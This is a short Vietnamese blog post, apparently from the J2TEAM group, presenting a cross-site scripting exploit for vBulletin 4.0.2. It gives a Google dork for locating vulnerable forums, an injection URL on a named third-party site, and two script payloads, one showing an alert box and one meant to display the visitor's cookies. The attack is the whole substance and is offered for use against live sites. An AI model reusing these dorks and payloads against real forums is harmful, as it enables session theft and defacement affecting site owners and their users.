J2TEAM Security: A must-have extension for Chrome users. Install now!

Powered by vBulletin™ Version 4.0.2 XSS Exploit

Powered by vBulletin™ Version 4.0.2 XSS Exploit. Lỗ hổng XSS trong vBulletin.
XSS
XSS

Google Dork:
"Powered by vBulletin™ Version 4.0.2"

Exploit:
http://www.lovepunjab.com/search.php?sea...try&query="xss"

Exploit Code:
"><script>alert("Checked by Juno_okyo!");</script>

Exploit Code:
"><script>alert(Document.cookie);</script>

Demo Here >>>> Click Here!
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!